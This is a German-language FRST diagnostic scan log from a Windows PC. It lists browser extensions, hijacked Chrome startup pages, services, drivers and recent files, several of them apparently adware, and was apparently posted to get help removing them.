FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-09-27] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3405180731-3880776032-2862364969-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\VadimSch\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-10-08] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-3405180731-3880776032-2862364969-1001: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [2015-12-30] ()
FF SearchPlugin: C:\Users\VadimSch\AppData\Roaming\Mozilla\Firefox\Profiles\0lzdlwjs.default\searchplugins\yahoo_ff.xml [2015-08-03]
FF Extension: NoScript - C:\Users\VadimSch\AppData\Roaming\Mozilla\Firefox\Profiles\0lzdlwjs.default\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232} [2012-07-09] [ist nicht signiert]
FF Extension: DVDVideoSoft YouTube MP3 and Video Download - C:\Users\VadimSch\AppData\Roaming\Mozilla\Firefox\Profiles\0lzdlwjs.default\extensions\{B64D9B05-48E1-4CEB-BF58-E0643994E900} [2014-12-26] [ist nicht signiert]
FF Extension: Kein Name - C:\Program Files\WBC Engine\Firefox [nicht gefunden]
FF Extension: AVG SafeGuard toolbar - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\17.3.1.91 [2014-03-17] [ist nicht signiert]
FF Extension: Lyrics Seeker - C:\Users\VadimSch\AppData\Roaming\Mozilla\Firefox\Profiles\0lzdlwjs.default\Extensions\133 [2013-09-13] [ist nicht signiert]
FF Extension: OptuOan - C:\Users\VadimSch\AppData\Roaming\Mozilla\Firefox\Profiles\0lzdlwjs.default\Extensions\CI@v7.com [2015-07-01] [ist nicht signiert]
FF Extension: Online HD TV - C:\Users\VadimSch\AppData\Roaming\Mozilla\Firefox\Profiles\0lzdlwjs.default\Extensions\onlinehdtv@onlinehd.tv.xpi [2012-10-23] [ist nicht signiert]
FF Extension: TrueSuite Website Logon - C:\Program Files (x86)\Mozilla Firefox\extensions\websitelogon@truesuite.com [2015-07-02] [ist nicht signiert]
FF Extension: DVDVideoSoft YouTube MP3 and Video Download - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{B64D9B05-48E1-4CEB-BF58-E0643994E900}.xpi [2014-12-15] [ist nicht signiert]
FF HKLM\...\Firefox\Extensions: [{121C6AF3-6778-4360-AFDB-57BD4E3E4343}] - C:\Program Files\Playzy\Firefox => nicht gefunden
FF HKLM\...\Firefox\Extensions: [{14DD0E04-D4F6-45d2-A958-F361FBD4F64F}] - C:\Program Files\WBC Engine\Firefox => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{121C6AF3-6778-4360-AFDB-57BD4E3E4343}] - C:\Program Files\Playzy\Firefox => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{14DD0E04-D4F6-45d2-A958-F361FBD4F64F}] - C:\Program Files\WBC Engine\Firefox => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [12x3q4@3244516.com] - C:\Program Files (x86)\Better-Surf\ff => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [ext@bettersurfplus.com] - C:\Program Files (x86)\BetterSurf\BetterSurfPlus\ff => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [ext@WebexpEnhancedV1alpha579.net] - C:\Program Files (x86)\WebexpEnhancedV1\WebexpEnhancedV1alpha579\ff
FF Extension: Webexp Enhanced - C:\Program Files (x86)\WebexpEnhancedV1\WebexpEnhancedV1alpha579\ff [2013-12-20] [ist nicht signiert]
FF HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Firefox\Extensions: [{72273571-743d-427e-a1c1-0538fbc2ddd3}] - C:\Program Files (x86)\LyricsSeeker\133.xpi => nicht gefunden
FF HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff
FF Extension: DVDVideoSoft YouTube MP3 and Video Download - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff [2014-12-26] [ist nicht signiert]

Chrome:
=======
CHR dev: Chrome dev build erkannt! <======= ACHTUNG
CHR HomePage: Default -> file:///C:/Users/VadimSch/Desktop/M%C3%BCll
CHR StartupUrls: Default -> "hxxp://google.com/","hxxp://search.iminent.com/?appId=A9CBA388-63F0-40E6-B3C9-D1DAF669D1DE","hxxp://search.chatzum.com/?orig=HP&affid=62&cztbid=805952679","hxxp://www.google.com","hxxp://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=17.3.1.91&pid=safeguard&sg=&sap=hp","hxxp://google.com/
hxxp://search.iminent.com/?appId={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&affid=62&cztbid=805952679
hxxp://www.google.com
hxxp://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=18.0.5.292&pid=safeguard&sg=&sap=hp","hxxp://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=18.0.5.292&pid=safeguard&sg=&sap=hp","hxxp://google.com/
hxxp://search.iminent.com/?appId={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&affid=62&cztbid=805952679
hxxp://www.google.com
hxxp://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=18.0.5.292&pid=safeguard&sg=&sap=hp
hxxp://google.com/
hxxp://search.iminent.com/?appId={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&affid=62&cztbid=805952679
hxxp://www.google.com
hxxp://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=18.0.5.292&pid=safeguard&sg=&sap=hp
hxxp://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=18.0.5.292&pid=safeguard&sg=&sap=hp","hxxp://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=18.1.0.443&pid=safeguard&sg=&sap=hp","hxxp://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=18.1.5.512&pid=safeguard&sg=&sap=hp","hxxp://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=18.1.7.598&pid=safeguard&sg=&sap=hp","hxxps://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=18.1.9.786&pid=safeguard&sg=&sap=hp","hxxps://mysearch.avg.com?cid={6CDBC0C9-5643-4C7B-BA71-BF3C0EE30552}&mid=34bd1b30801a47d08ff1fd087e409260-48d77eb8077c1e613eccf4a5b6439e179a68fe91&lang=de&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-03-17 14:09:03&v=18.1.9.799&pid=safeguard&sg=&sap=hp","hxxp://leo-statz-berufskolleg.de"
CHR Profile: C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (BetterTTV) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajopnjidmegmdimjlfnijceegpefgped [2015-07-29]
CHR Extension: (Facebook Video Downloader) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2015-12-07]
CHR Extension: (YouTube Notifications) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\cilgbgkmanbbecbjihnbpeaoodmgchom [2015-12-28]
CHR Extension: (Steam inventory helper) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmeakgjggjdlcpncigglobpjbkabhmjl [2016-01-11]
CHR Extension: (Google-Suche) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Video Downloader professional) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\elicpjhcidhpjomhibiffojpinpmmpil [2015-02-04]
CHR Extension: (AdBlock) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-01-09]
CHR Extension: (agar.io server browser) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\hongpdkjnjhijmdnogoicadboadgllhi [2015-06-08]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-26]
CHR Extension: (Hola - Unlimited Proxy VPN) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\opalpjjboefohnelaemnhdhlceibbcgl [2015-12-30]
CHR Extension: (Instagram Video Downloader) - C:\Users\VadimSch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pccijgeciailcjildclhbjgakoemgjjg [2015-02-04]
CHR HKU\S-1-5-21-3405180731-3880776032-2862364969-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [eajpfgckapbejakplmjlcakccjihopih] - C:\Users\VadimSch\AppData\Local\CRE\eajpfgckapbejakplmjlcakccjihopih.crx <nicht gefunden>
CHR HKLM-x32\...\Chrome\Extension: [dkinklhnkmkhkhofcnapakaoehijaoih] - C:\Program Files (x86)\OnlineHD.TV\onhd11.crx [2012-10-23]
CHR HKLM-x32\...\Chrome\Extension: [eajpfgckapbejakplmjlcakccjihopih] - C:\Users\VadimSch\AppData\Local\CRE\eajpfgckapbejakplmjlcakccjihopih.crx <nicht gefunden>
CHR HKLM-x32\...\Chrome\Extension: [jpgfhihjicjofdejkbjgnjlaglaciobe] - C:\Program Files (x86)\HP SimplePass 2011\tschrome.crx [2011-06-03]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]
CHR HKLM-x32\...\Chrome\Extension: [mmifolfpllfdhilecpdpmemhelmanajl] - C:\Program Files (x86)\BetterSurf\BetterSurfPlus\ch\BetterSurfPlus.crx <nicht gefunden>
CHR HKLM-x32\...\Chrome\Extension: [niogeckbkdcabhnapjbkeiklablhjoca] - C:\Program Files (x86)\Perion\ChromeInfoBar\ChromeInfoBar.crx <nicht gefunden>
CHR HKLM-x32\...\Chrome\Extension: [nkbllngnehoipjfgopomkdpbgcdpljnc] - C:\Program Files (x86)\WebexpEnhancedV1\WebexpEnhancedV1alpha579\ch\WebexpEnhancedV1alpha579.crx [2013-12-19]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AESMFilters; C:\Windows\system32\AESMSr64.exe [103112 2014-06-08] (Andrea Electronics Corporation)
S3 AvgAMPS; C:\Program Files (x86)\AVG\Av\avgamps.exe [627544 2015-12-16] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\Av\avgidsagent.exe [3902984 2015-12-16] (AVG Technologies CZ, s.r.o.)
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1049000 2015-12-08] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\Av\avgwdsvcx.exe [583936 2015-12-16] (AVG Technologies CZ, s.r.o.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2013-12-02] () [Datei ist nicht signiert]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\47.0.2526.18\remoting_host.exe [69448 2015-10-14] (Google Inc.)
R2 ezSharedSvc; C:\Windows\SysWOW64\ezSharedSvcHost.exe [514232 2010-04-23] (EasyBits Software AS) [Datei ist nicht signiert]
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1155216 2015-08-07] (NVIDIA Corporation)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [Datei ist nicht signiert]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [417552 2015-11-12] (LogMeIn, Inc.)
S4 msvsmon90; C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe [4466688 2007-11-08] (Microsoft Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1871504 2015-08-07] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [5544592 2015-08-07] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2015-12-17] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2015-01-30] ()
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Datei ist nicht signiert]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5611280 2015-08-07] (TeamViewer GmbH)
R2 UnsignedThemes; C:\Windows\UnsignedThemesSvc.exe [24168 2009-07-13] (The Within Network, LLC)
R2 vToolbarUpdater19.1.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\ToolbarUpdater.exe [1864592 2015-12-12] (AVG Secure Search)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S2 e9f32388; "C:\Windows\system32\rundll32.exe" "c:\progra~2\gssupp~1\AssistantSvc.dll",service

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 AESMAudL; C:\Windows\System32\drivers\AESMAudL64.sys [23496 2014-06-08] (Andrea Electronics Corporation)
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [184240 2015-11-06] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [315312 2015-12-04] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [298416 2015-08-20] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [284080 2015-10-21] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [398256 2015-08-14] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [258480 2015-12-04] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [42416 2015-12-04] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [302000 2015-10-08] (AVG Technologies CZ, s.r.o.)
S3 DCamUSBVM; C:\Windows\System32\Drivers\usbVM31b.sys [142336 2005-09-19] (Vimicro Corporation)
R3 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2014-11-24] (Disc Soft Ltd)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Logitech Inc.)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2015-08-07] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [47976 2015-08-07] (NVIDIA Corporation)
S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2011-12-06] ()
S3 taphss6; C:\Windows\System32\DRIVERS\taphss6.sys [42088 2015-06-04] (Anchorfree Inc.)
R2 uxpatch; C:\Windows\system32\drivers\uxpatch.sys [30568 2009-07-13] ()
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
S2 sbapifs; system32\DRIVERS\sbapifs.sys [X]
S3 X6va009; \??\C:\Windows\SysWOW64\Drivers\X6va009 [X]
S3 X6va010; \??\C:\Windows\SysWOW64\Drivers\X6va010 [X]
S3 X6va011; \??\C:\Windows\SysWOW64\Drivers\X6va011 [X]
S3 X6va012; \??\C:\Windows\SysWOW64\Drivers\X6va012 [X]
S3 X6va014; \??\C:\Windows\SysWOW64\Drivers\X6va014 [X]
S3 X6va015; \??\C:\Windows\SysWOW64\Drivers\X6va015 [X]
S3 X6va029; \??\C:\Windows\SysWOW64\Drivers\X6va029 [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-01-11 21:47 - 2016-01-11 22:03 - 00000000 ____D C:\FRST
2016-01-11 21:36 - 2016-01-11 21:40 - 00001592 _____ C:\AdwCleaner[R4].txt
2016-01-11 21:26 - 2016-01-11 21:26 - 00000000 ____D C:\Users\VadimSch\AppData\Local\AVG Secure Search
2016-01-11 21:20 - 2016-01-11 21:21 - 00005705 _____ C:\AdwCleaner[S3].txt
2016-01-11 21:14 - 2016-01-11 21:19 - 00005799 _____ C:\AdwCleaner[R3].txt
2016-01-11 11:02 - 2016-01-11 11:02 - 00001948 _____ C:\Users\VadimSch\Desktop\MinecraftStoryModes.exe - Verknüpfung.lnk
2016-01-11 09:52 - 2016-01-11 09:52 - 00000000 ____D C:\ProgramData\1063022329703654763UL
2016-01-11 09:50 - 2016-01-11 09:50 - 00019342 _____ C:\Windows\System32\Tasks\{76D3C411-4756-A571-5526-2C017D45B9F9}
2016-01-11 09:50 - 2016-01-11 09:50 - 00000000 ____D C:\ProgramData\{1bb373b7-1064-0}
2016-01-11 09:50 - 2016-01-11 09:50 - 00000000 ____D C:\ProgramData\{10377d0b-4064-1}
2016-01-02 14:46 - 2016-01-02 14:46 - 18506432 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2016-01-02 00:38 - 2016-01-02 00:38 - 00000000 ____D C:\Users\VadimSch\AppData\Roaming\Red Giant
2016-01-02 00:38 - 2016-01-02 00:38 - 00000000 ____D C:\ProgramData\Red Giant
2016-01-01 15:06 - 2016-01-01 15:06 - 00135536 _____ C:\Users\VadimSch\Documents\Track 11 - 35.sfk
2016-01-01 15:02 - 2016-01-01 15:06 - 34682330 _____ C:\Users\VadimSch\Documents\Track 11 - 35.wav
2016-01-01 15:02 - 2016-01-01 15:02 - 02781518 _____ C:\Users\VadimSch\Documents\Track 11 - 34.wav
2016-01-01 15:02 - 2016-01-01 15:02 - 00010920 _____ C:\Users\VadimSch\Documents\Track 11 - 34.sfk
2015-12-30 12:17 - 2015-12-30 12:17 - 00057440 _____ C:\Users\VadimSch\Documents\Track 13 - 12.sfk
2015-12-30 12:15 - 2015-12-30 14:03 - 00019520 _____ C:\Users\VadimSch\Documents\Track 13 - 10.sfk
2015-12-30 12:15 - 2015-12-30 14:03 - 00003136 _____ C:\Users\VadimSch\Documents\Track 13 - 11.sfk
2015-12-30 12:15 - 2015-12-30 12:17 - 14691122 _____ C:\Users\VadimSch\Documents\Track 13 - 12.wav
2015-12-30 12:15 - 2015-12-30 12:15 - 02491242 _____ C:\Users\VadimSch\Documents\Track 13 - 10.wav
2015-12-30 12:15 - 2015-12-30 12:15 - 00394022 _____ C:\Users\VadimSch\Documents\Track 13 - 11.wav
2015-12-30 12:15 - 2015-12-30 12:15 - 00033976 _____ C:\Users\VadimSch\Documents\Track 13 - 9.sfk
2015-12-30 12:09 - 2015-12-30 14:03 - 00104680 _____ C:\Users\VadimSch\Documents\Track 13 - 8.sfk
2015-12-30 12:09 - 2015-12-30 12:15 - 08683642 _____ C:\Users\VadimSch\Documents\Track 13 - 9.wav
2015-12-30 12:06 - 2015-12-30 12:09 - 13391842 _____ C:\Users\VadimSch\Documents\Track 13 - 8.wav
2015-12-30 12:06 - 2015-12-30 12:06 - 00023504 _____ C:\Users\VadimSch\Documents\Track 13 - 7.sfk
2015-12-30 12:05 - 2015-12-30 12:06 - 06002158 _____ C:\Users\VadimSch\Documents\Track 13 - 7.wav
2015-12-29 21:38 - 2015-12-29 21:53 - 00297744 _____ C:\Users\VadimSch\Desktop\tea.veg.bak
2015-12-29 21:38 - 2015-12-29 21:53 - 00297744 _____ C:\Users\VadimSch\Desktop\tea.veg
2015-12-29 14:01 - 2015-12-29 14:01 - 00351120 _____ C:\Users\VadimSch\Documents\Track 12 - 3.sfk
2015-12-29 13:53 - 2015-12-29 14:01 - 89871690 _____ C:\Users\VadimSch\Documents\Track 12 - 3.wav
2015-12-21 11:21 - 2015-12-21 11:21 - 00015872 _____ C:\Users\VadimSch\Documents\Track 25 - 9.sfk
2015-12-21 11:20 - 2015-12-21 11:21 - 04048374 _____ C:\Users\VadimSch\Documents\Track 25 - 9.wav
2015-12-21 11:20 - 2015-12-21 11:20 - 02185858 _____ C:\Users\VadimSch\Documents\Track 25 - 8.wav
2015-12-21 11:20 - 2015-12-21 11:20 - 00017656 _____ C:\Users\VadimSch\Documents\Track 25 - 7.sfk
2015-12-21 11:20 - 2015-12-21 11:20 - 00008592 _____ C:\Users\VadimSch\Documents\Track 25 - 8.sfk
2015-12-21 11:19 - 2015-12-21 11:20 - 04505026 _____ C:\Users\VadimSch\Documents\Track 25 - 7.wav
2015-12-21 11:19 - 2015-12-21 11:19 - 00011680 _____ C:\Users\VadimSch\Documents\Track 25 - 6.sfk
2015-12-21 11:17 - 2015-12-21 11:19 - 02975410 _____ C:\Users\VadimSch\Documents\Track 25 - 6.wav
2015-12-21 11:17 - 2015-12-21 11:17 - 05476482 _____ C:\Users\VadimSch\Documents\Track 25 - 5.wav
2015-12-21 11:17 - 2015-12-21 11:17 - 00021448 _____ C:\Users\VadimSch\Documents\Track 25 - 5.sfk
2015-12-21 11:17 - 2015-12-21 11:17 - 00011216 _____ C:\Users\VadimSch\Documents\Track 25 - 4.sfk
2015-12-21 11:15 - 2015-12-21 11:17 - 02856750 _____ C:\Users\VadimSch\Documents\Track 25 - 4.wav
2015-12-21 11:15 - 2015-12-21 11:15 - 00033392 _____ C:\Users\VadimSch\Documents\Track 25 - 3.sfk
2015-12-21 11:14 - 2015-12-21 11:15 - 08534942 _____ C:\Users\VadimSch\Documents\Track 25 - 3.wav
2015-12-21 11:14 - 2015-12-21 11:14 - 00017488 _____ C:\Users\VadimSch\Documents\Track 25 - 2.sfk
2015-12-21 11:12 - 2015-12-21 11:14 - 04462542 _____ C:\Users\VadimSch\Documents\Track 25 - 2.wav
2015-12-21 11:12 - 2015-12-21 11:12 - 01006990 _____ C:\Users\VadimSch\Documents\Track 25 - 1.wav
2015-12-21 11:12 - 2015-12-21 11:12 - 00003992 _____ C:\Users\VadimSch\Documents\Track 25 - 1.sfk
2015-12-15 14:49 - 2015-12-15 14:49 - 00435960 _____ C:\Users\VadimSch\Documents\Track 11 - 33.sfk
2015-12-15 14:40 - 2015-12-15 14:49 - 111591130 _____ C:\Users\VadimSch\Documents\Track 11 - 33.wav
2015-12-14 13:58 - 2015-12-14 13:58 - 00279600 _____ C:\Users\VadimSch\Documents\Track 10 - 40.sfk
2015-12-14 13:51 - 2015-12-14 13:58 - 71563734 _____ C:\Users\VadimSch\Documents\Track 10 - 40.wav
2015-12-14 13:51 - 2015-12-14 13:51 - 00405528 _____ C:\Users\VadimSch\Documents\Track 10 - 39.sfk
2015-12-14 13:42 - 2015-12-14 13:51 - 103800822 _____ C:\Users\VadimSch\Documents\Track 10 - 39.wav
2015-12-12 11:21 - 2015-12-12 11:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-01-11 22:02 - 2012-05-30 20:33 - 00000000 ____D C:\Users\VadimSch\AppData\Local\LogMeIn Hamachi
2016-01-11 21:51 - 2012-05-06 21:29 - 00000000 ____D C:\Users\VadimSch\AppData\Roaming\Skype
2016-01-11 21:50 - 2009-07-14 04:20 - 00000000 ____D C:\Windows
2016-01-11 21:48 - 2015-09-17 15:44 - 00000000 ____D C:\Users\VadimSch\Downloads\INTERNET
2016-01-11 21:46 - 2013-08-31 16:52 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-01-11 21:36 - 2009-07-14 05:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-01-11 21:36 - 2009-07-14 05:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-01-11 21:26 - 2014-09-28 21:38 - 00000482 ____H C:\Windows\Tasks\SW-Booster-S-792098896.job
2016-01-11 21:26 - 2014-03-12 17:31 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-11 21:26 - 2013-12-30 21:50 - 00000450 ____H C:\Windows\Tasks\GS.Enabler-S-4560858878.job
2016-01-11 21:26 - 2012-04-25 13:23 - 00000000 ____D C:\Program Files (x86)\Steam
2016-01-11 21:26 - 2012-04-23 16:30 - 00000000 ____D C:\Users\VadimSch\AppData\LocalLow\AuthenTec
2016-01-11 21:25 - 2014-03-12 17:31 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-11 21:25 - 2013-01-11 22:12 - 00000436 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2016-01-11 21:24 - 2011-12-06 01:56 - 00000000 ____D C:\ProgramData\NVIDIA
2016-01-11 21:24 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-11 21:19 - 2012-04-23 16:38 - 00003938 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{DCD8292C-B58C-4E8F-A561-212FBD884528}
2016-01-11 21:14 - 2012-04-24 13:20 - 00000000 ____D C:\ProgramData\MFAData
2016-01-11 18:21 - 2014-09-18 12:02 - 00000000 ____D C:\Users\VadimSch\AppData\Roaming\OBS
2016-01-11 16:11 - 2012-04-24 13:09 - 00000000 ____D C:\Users\VadimSch\AppData\Local\Adobe
